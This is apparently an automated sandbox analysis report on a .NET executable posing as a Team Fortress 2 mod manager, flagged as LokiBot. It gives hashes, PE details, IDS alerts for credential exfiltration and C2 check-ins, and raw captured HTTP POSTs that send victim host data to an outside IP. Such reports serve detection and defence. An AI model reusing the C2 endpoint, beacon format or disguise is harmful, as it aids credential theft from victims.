                    SHA-256:A3AD19CA6EA04695FCD30034EAF389235385F3FA283837316916AF0CDA09DCC0
                    SHA-512:6B3595E6C9B1EF62BBF5FA5716AFC09CF5025FB3E8B8906B773B37AE0EB6DB10A3DBC0392E681D9DDA72EDF6FB357679F9E2BC06B7857B11083A916FE0A2DEE5
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):1219072
                    Entropy (8bit):7.089897950228557
                    Encrypted:false
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    MD5:76AFCE42F708E6A32DC9D0E52F9F0336
                    SHA1:D7A3D05C161BCFDAFE6348D82672D011FC5B05CC
                    SHA-256:9E658EB8027169730EF306E2E3B145DD71C9D9F569CE7DD7C8264A0DFC114D87
                    SHA-512:DB66F324D80D2CBE1DC9B0FD7CCDEED896ED5E4E08C4E837542D27371AB05BEFDB43DFB46655EF725ABA3B3A6582BE908DA5A6D44BDDE7900977520EB355E3D9
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 26%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................z............... ........@.. ....................................@.................................P...W.................................................................................... ............... ..H............text....y... ...z.................. ..`.reloc...............|..............@..B.rsrc................~..............@..@........................H........@...X......$...T...|...........................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....W...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe:Zone.Identifier
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: [ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.089897950228557
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:2CW1YLhNIS.exe
                    File size:1219072
                    MD5:76afce42f708e6a32dc9d0e52f9f0336
                    SHA1:d7a3d05c161bcfdafe6348d82672d011fc5b05cc
                    SHA256:9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
                    SHA512:db66f324d80d2cbe1dc9b0fd7ccdeed896ed5e4e08c4e837542d27371ab05befdb43dfb46655ef725aba3b3a6582be908da5a6d44bdde7900977520eb355e3d9
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................z............... ........@.. ....................................@................................

                    File Icon

                    Icon Hash:86a8b6ca9496ca9a

                    Static PE Info

                    General

                    Entrypoint:0x5199aa
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x60D196E2 [Tue Jun 22 07:53:06 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1199500x57.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x11c0000x11a8c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11a0000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x1179b00x117a00False0.652703467255PGP symmetric key encrypted data - Plaintext or unencrypted data7.17424045556IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .reloc0x11a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc0x11c0000x11a8c0x11c00False0.264510893486data5.50345948852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x11c1f00x1bcbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                    RT_ICON0x11ddbc0xc828data
                    RT_ICON0x12a5e40x1ca8data
                    RT_ICON0x12c28c0xca8data
                    RT_ICON0x12cf340x568GLS_BINARY_LSB_FIRST
                    RT_GROUP_ICON0x12d49c0x4cdata
                    RT_VERSION0x12d4e80x3f0SysEx File - OctavePlateau
                    RT_MANIFEST0x12d8d80x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Version Infos

                    DescriptionData
                    Translation0x0000 0x04b0
                    LegalCopyrightCopyright bluFiles 2013
                    Assembly Version1.0.0.0
                    InternalNameSearchData.exe
                    FileVersion1.0.0.0
                    CompanyNamebluFiles
                    LegalTrademarksola k ase
                    CommentsActiva / Desactiva / Instala modificaciones al juego Team Fortress 2
                    ProductNameTf2ModManager
                    ProductVersion1.0.0.0
                    FileDescriptionTf2 Mod Manager
                    OriginalFilenameSearchData.exe

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/22/21-18:23:10.839209TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.463.141.228.141
                    06/22/21-18:23:10.839209TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973580192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.463.141.228.141
                    06/22/21-18:23:12.059133TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973780192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.463.141.228.141
                    06/22/21-18:23:13.182092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.463.141.228.141
                    06/22/21-18:23:14.320616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.463.141.228.141

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 22, 2021 18:23:10.672245026 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:10.831842899 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:10.831969976 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:10.839209080 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.000123024 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.000273943 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.162691116 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658402920 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658443928 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658499002 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658540964 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658548117 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658580065 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658617973 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658648968 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658660889 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658677101 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.658689976 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658742905 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.658787966 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.667711020 CEST804973563.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:11.667861938 CEST4973580192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:11.892693043 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.054799080 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.054970026 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.059133053 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.219713926 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.219800949 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.379004955 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893781900 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893882036 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893944025 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.893996954 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894001961 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894057989 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894182920 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894191027 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894217968 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.894329071 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.894357920 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:12.902987003 CEST804973763.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:12.903398037 CEST4973780192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.019453049 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.179152966 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:13.179404020 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.182091951 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.341525078 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:13.342540026 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:13.502113104 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000350952 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000412941 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000477076 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000520945 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000557899 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000595093 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000632048 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000668049 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.000715971 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.000869989 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.001041889 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.008945942 CEST804973963.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.009135008 CEST4973980192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.154073000 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.313632965 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.313771009 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.320616007 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.480439901 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:14.480549097 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:14.640264034 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133425951 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133486986 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133528948 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133567095 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133569002 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133605003 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133620024 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133641958 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133680105 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133697033 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.133716106 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.133764982 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:15.142693996 CEST804974163.141.228.141192.168.2.4
                    Jun 22, 2021 18:23:15.142910004 CEST4974180192.168.2.463.141.228.141
                    Jun 22, 2021 18:23:18.268584967 CEST4974180192.168.2.463.141.228.141

                    HTTP Request Dependency Graph

                    • 63.141.228.141

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.44973563.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:10.839209080 CEST1229OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:11.000273943 CEST1229OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones610930DESKTOP-716T771k08F9C4E9C79A3B52B3F739430eljqb
                    Jun 22, 2021 18:23:11.658402920 CEST1232INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                    Jun 22, 2021 18:23:11.658443928 CEST1234INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                    Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                    Jun 22, 2021 18:23:11.658499002 CEST1235INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                    Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                    Jun 22, 2021 18:23:11.658548117 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                    Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
